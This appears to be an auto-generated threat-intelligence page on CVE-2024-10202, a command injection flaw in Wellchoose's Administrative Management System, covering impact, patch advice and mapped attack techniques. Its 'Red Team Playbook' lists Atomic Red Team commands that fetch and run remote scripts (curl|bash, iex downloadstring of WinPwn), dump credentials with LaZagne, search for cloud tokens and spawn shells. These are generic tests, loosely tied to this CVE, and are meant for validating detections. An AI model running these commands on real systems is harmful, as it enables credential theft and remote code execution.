CVE-2024-10202
Overview
The vulnerability is an OS Command Injection within the Wellchoose Administrative Management System. It arises from insufficient input validation in components that process user-supplied data, allowing injection of arbitrary operating system commands. The affected component is the administrative interface responsible for handling command inputs from authenticated users with regular privileges.
Vulnerability Description
Administrative Management System from Wellchoose has an OS Command Injection vulnerability, allowing remote attackers with regular privileges to inject and execute arbitrary OS commands.
Impact
An attacker with regular user privileges can execute arbitrary OS commands remotely, potentially leading to full system compromise, data manipulation, or service disruption. Exploitation requires network access and valid authentication (PR:L), but no user interaction is needed (UI:N). The vulnerability impacts confidentiality, integrity, and availability as indicated by the CVSS vector (C:H/I:H/A:H), enabling lateral movement or persistent foothold within the affected environment.
Solution
According to the TW-CERT advisories (https://www.twcert.org.tw/tw/cp-132-8162-dc491-1.html and https://www.twcert.org.tw/en/cp-139-8163-b701e-2.html), Wellchoose has released patches addressing this command injection flaw. Administrators should apply the latest security updates for the Administrative Management System as specified in these advisories. If immediate patching is not feasible, restricting access to the administrative interfaces and enforcing strict input validation are recommended as interim mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Administrative Management System from Wellchoose is susceptible to an OS Command Injection vulnerability, which allows attackers to execute arbitrary operating system commands on the server hosting the application. This vulnerability arises from insufficient input validation, enabling attackers to manipulate input fields that are processed by the system's command execution functions. When user-supplied data is not properly sanitized, it can lead to the execution of unintended commands, which may compromise the integrity and confidentiality of the system. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk that organizations must address promptly.
Attack vectors for this vulnerability are varied and can be exploited through multiple entry points within the application. For instance, an attacker with regular user privileges could craft a malicious payload that is injected into input fields such as forms or URL parameters, which are subsequently processed by the server. Once the payload is executed, the attacker can gain unauthorized access to the underlying operating system, allowing them to perform actions such as data exfiltration, system manipulation, or further lateral movement within the network. Scenarios could include an attacker leveraging this vulnerability to install backdoors, escalate privileges, or disrupt services, thereby posing a significant threat to the organization's operational continuity.
The real-world impact of this vulnerability on businesses can be profound. Organizations utilizing the Administrative Management System may face severe reputational damage, financial loss, and legal ramifications if sensitive data is compromised or if the system is used to launch attacks against other targets. The potential for data breaches is particularly concerning, as attackers could gain access to confidential information, including customer data, financial records, and proprietary business information. Furthermore, the exploitation of this vulnerability could lead to regulatory fines, especially if the organization is subject to data protection laws such as GDPR or HIPAA, which mandate strict security measures to protect personal information.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted security strategy. Regular security assessments, including penetration testing and code reviews, can help identify and remediate vulnerabilities before they can be exploited. Additionally, employing Web Application Firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests. Input validation and sanitization should be a priority in the development lifecycle, ensuring that all user inputs are rigorously checked and encoded to prevent command injection. Furthermore, organizations should maintain an incident response plan that includes procedures for addressing potential breaches, thereby minimizing the impact of any successful exploitation.
In conclusion, the OS Command Injection vulnerability present in the Administrative Management System from Wellchoose poses a significant threat to organizations that rely on this software. The potential for unauthorized command execution can lead to severe consequences, including data breaches and operational disruptions. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, organizations can take proactive steps to enhance their security posture. Implementing robust detection and mitigation strategies will be crucial in safeguarding against the exploitation of this vulnerability and ensuring the integrity of their systems.
CSURFACE threat intelligence has detected an initial confirmed sighting of activity exploiting the CVE-2024-10202 vulnerability in the Wellchoose Administrative Management System. This emergence marks a shift from theoretical risk to active targeting, underscored by a sharp escalation in telemetry signals related to this vulnerability. Although the EPSS score remains low and stable, the detection of exploitation attempts—even at an early stage—indicates that adversaries are beginning to operationalize this flaw. For defenders, this development elevates the urgency of monitoring and response efforts, as the window for proactive defense narrows. While no new exploit variants or ransomware group associations have been identified, the presence of active exploitation attempts suggests that threat actors may soon incorporate this vulnerability into broader attack campaigns, potentially increasing the risk of unauthorized command execution and subsequent operational impact.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wellchoose | Administrative Management System | N/A |
cpe:2.3:a:wellchoose:administrative_management_system:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10202 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-8162-dc491-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-8163-b701e-2.html |